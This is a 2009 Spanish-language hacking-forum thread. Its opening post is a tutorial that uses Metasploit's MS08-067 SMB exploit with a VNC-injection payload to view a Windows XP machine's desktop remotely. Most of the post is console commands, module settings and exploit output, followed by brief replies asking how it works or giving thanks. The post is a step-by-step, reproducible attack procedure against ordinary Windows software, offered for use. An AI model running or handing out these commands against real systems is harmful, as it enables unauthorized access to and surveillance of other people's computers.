elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [Metasploit] Vista del Escritorio Remoto con VNC
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Metasploit] Vista del Escritorio Remoto con VNC  (Leído 11,849 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
[Metasploit] Vista del Escritorio Remoto con VNC
« en: 23 Diciembre 2009, 20:14 pm »

Vista del Escritorio Remoto con VNC
[Metasploit By: Shell Root]


Una de las muchas herramientas que trae integrada el Metasploit aparte de la que ya hemos visto (keyylogger & Screenshot). Tambien podemos conectarnos con VNC para ver el Escritorio Remoto. Aquí veremos el uso de esté servicio del Metasploit.

Primero ingresaremos a la P.C con el exploit:
    * exploit/windows/smb/ms08_067_netapi

y con el PAYLOAD:
    * windows/vncinject/bind_tcp

Código:
                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 9 days hago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 9 days hago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp
PAYLOAD => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.0.3      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/vncinject/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   AUTOVNC   true             yes       Automatically launch VNC viewer if present
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.0.3      no        The target address
   VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
   VNCPORT   5900             yes       The local port to use for the VNC proxy


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (197120 bytes)
[*] VNC Server session 1 opened (192.168.0.2:2128 -> 192.168.0.3:4444)
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
[-] Exploit failed: Bad file descriptor
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > VNC Viewer Free Edition - VNC Viewer Free Edition for Win32, Version 4.1.3
Built on Oct 15 2008 at 17:04:00
Copyright © RealVNC Ltd. 2002-2008

[*] VNC Server session 1 closed.


Con ayuda del PAYLOAD windows/vncinject/bind_tcp podemos ejecutar el VNC y ver el escritorio remoto.

Imagen:


By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/vista-del-escritorio-remoto-con-vnc.html
Video: http://www.youtube.com/watch?v=k30889rxcOQ
« Última modificación: 23 Diciembre 2009, 21:44 pm por alex19910218 » En línea

Te vendería mi talento por poder dormir tranquilo.
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: [Metasploit] Vista del Escritorio Remoto con VNC
« Respuesta #1 en: 24 Diciembre 2009, 01:54 am »

Pero como es esto? ponemos use.... y ya te muestra todo? disculpa mi ignorancia...
En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: [Metasploit] Vista del Escritorio Remoto con VNC
« Respuesta #2 en: 24 Diciembre 2009, 02:12 am »

no poniendo use, elegis el exploit y despues vas configurando
 (host, etc)

saludos!


quedo genial che ;);)
PD:MIrate el video!
« Última modificación: 24 Diciembre 2009, 02:22 am por fede_cp » En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Masita

Desconectado Desconectado

Mensajes: 120


pythoneando


Ver Perfil
Re: [Metasploit] Vista del Escritorio Remoto con VNC
« Respuesta #3 en: 24 Diciembre 2009, 02:22 am »

Lo que hace es inyectar un payload que en lugar de conseguir una shell, nos da una sesion vnc.
En línea

En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....
antinnel

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [Metasploit] Vista del Escritorio Remoto con VNC
« Respuesta #4 en: 24 Diciembre 2009, 02:50 am »

si el uso de un exploit es para vosotros un "hacking avanzdo" vaya generacion futura :o
En línea

Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: [Metasploit] Vista del Escritorio Remoto con VNC
« Respuesta #5 en: 24 Diciembre 2009, 03:07 am »

la creqacion de un exploit que utilice una vulnerabilidad en memoria encontrada por vos, y la utilizacion de este exploit paraa el hacken, es hacking avnazado.
En línea

alexkof158


Desconectado Desconectado

Mensajes: 415


LOL


Ver Perfil
Re: [Metasploit] Vista del Escritorio Remoto con VNC
« Respuesta #6 en: 23 Febrero 2010, 13:09 pm »

uff estaba buscando esto graciassssss  ;-)
En línea

"noproxy"
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Metasploit Windows Vista
Bugs y Exploits
kasail 2 3,564 Último mensaje 25 Junio 2014, 00:12 am
por kasail
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines